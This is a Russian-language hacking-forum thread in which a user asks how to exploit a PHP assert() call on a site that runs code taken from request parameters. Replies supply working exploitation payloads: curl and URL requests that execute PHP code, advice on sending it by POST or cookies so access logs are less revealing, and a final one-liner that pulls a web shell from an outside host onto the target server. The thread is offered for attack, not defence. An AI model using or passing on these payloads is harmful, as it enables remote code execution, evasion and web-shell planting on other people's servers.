PHP assert

Discussion in 'Песочница' started by marynli, 25 Apr 2016.

  1. marynli

    marynli Banned

    Joined:
    29 Jun 2015
    Messages:
    26
    Likes Received:
    7
    Reputations:
    0
    Допустим в php файле на сайте есть строка вида:
    PHP:
    assert($_REQUEST[123123123);
    Как можно раскрутить это? С PHP плохо знаком, но шестое чувство подсказывает что он получает запрос на переменную 123123123 и выполняет PHP код (assert).

    Как можно написать PHP скрипт чтобы использовать данную уязвимость ?
    Какой код лучше заливать?
     
    #1 marynli, 25 Apr 2016
  2. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    829
    Likes Received:
    815
    Reputations:
    90
    в параметр 123123123 пишешь пхп код, он выполняется

    curl 'http://site.ru/' --data '123123123=phpinfo();'
     
    _________________________
    #2 t0ma5, 25 Apr 2016
    marynli likes this.
  3. strelok20094

    strelok20094 Member

    Joined:
    26 Mar 2011
    Messages:
    81
    Likes Received:
    6
    Reputations:
    2
    site.com/yourfile.php?123123123=phpinfo();
     
    #3 strelok20094, 25 Apr 2016
    marynli likes this.
  4. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    829
    Likes Received:
    815
    Reputations:
    90
    get палевно
     
    _________________________
    #4 t0ma5, 25 Apr 2016
  5. strelok20094

    strelok20094 Member

    Joined:
    26 Mar 2011
    Messages:
    81
    Likes Received:
    6
    Reputations:
    2
    а пост беспалевно? вот тебе выдерка из access log

    xx.xx.xx.xxx - - [xx/Apr/xx:xx:xx:xx-0500] "POST /yourfile.php HTTP/1.1" 200 44
     
    #5 strelok20094, 25 Apr 2016
  6. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    829
    Likes Received:
    815
    Reputations:
    90
    вот тебе выдержка из access log

    xx.xx.xx.xxx - - [xx/Apr/xx:xx:xx:xx-0500] "GET /yourfile.php?123123123=phpinfo(); HTTP/1.1" 200 44

    сам ответь что беспалевней
     
    _________________________
    #6 t0ma5, 25 Apr 2016
  7. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    829
    Likes Received:
    815
    Reputations:
    90
    если уж на то пошло то я бы через куки слал

    curl 'http://site.ru' -H 'Cookie: '123123123=phpinfo()'
     
    _________________________
    #7 t0ma5, 25 Apr 2016
    strelok20094 likes this.
  8. marynli

    marynli Banned

    Joined:
    29 Jun 2015
    Messages:
    26
    Likes Received:
    7
    Reputations:
    0
    А как запихать туда веб шелл?
     
    #8 marynli, 29 Apr 2016
  9. private_static

    private_static Member

    Joined:
    19 May 2015
    Messages:
    118
    Likes Received:
    76
    Reputations:
    22
    Code:
    site.com/file.php?123123123=copy("http://mysite.com/shell.txt","shell.php");
    зальётся по пути site.com/shell.php
     
    #9 private_static, 29 Apr 2016
    marynli likes this.
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.